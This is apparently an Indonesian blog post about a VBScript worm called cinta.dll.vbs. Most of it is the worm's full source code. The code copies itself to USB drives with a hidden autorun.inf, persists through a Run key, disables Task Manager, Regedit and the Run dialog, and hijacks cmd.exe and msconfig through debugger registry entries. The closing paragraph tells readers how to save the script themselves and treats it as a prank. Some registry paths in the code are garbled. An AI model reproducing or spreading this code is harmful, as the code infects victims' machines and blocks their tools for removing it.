- HURRY -

Mungkin ada beberapa orang yang pernah kena virus ini yang ber extension (---.dll.vbs). Yang merubah sistem registri sehingga menyebabkan tombol find pada explorer ga berfungsi, task manager ga berfungsi, run ga berfungsi, registri editor ga berfungsi, dos dirubah jadi notepad, ga bisa instal program. di title bar internet explorer ada tulisan hack (sesuai keinginan si pembuat) & scrip otomatis ini bisa copy sendiri ke flasdisk, floopy and dalam beberapa detik hidden. Dan pokoknya masih banyak lagi dah, kalau mau lebih jelas perhatiin aja. scrip dibawah ini.

'My name is Slow but sure V1.08
on error resume next
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe cinta.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "cinta.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "cinta.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(winpath & "cinta.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"bakteri.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"cinta.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"cinta.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title","Hacked by setyo"
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden", "0", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRuncinta", winpath & "cinta.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exeDebugger","notepad.exe"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization", "Jangan panik ya, ini bukan virus tapi bakteri komputer !"
rg.regwrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner","cinta"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run winpath & "explorer.exe /e,/select, " & Wscript.ScriptFullname

Kadang-kadang orang suka iseng. kalo orang yang ga ngerti tentang registri pada windows pasti ga bisa berbuat banyak.
Kalau pembaca mau nyoba scrip ini gampang kok. Pertama buka notepad, copy script nya, kalo udah save as dengan nama sesuai dengan judul scrip ini yaitu (cinta.dll.vbs) ingat ya kalo udah di save as file ini jangan di buka (di double click) and simpan di folder yang aman.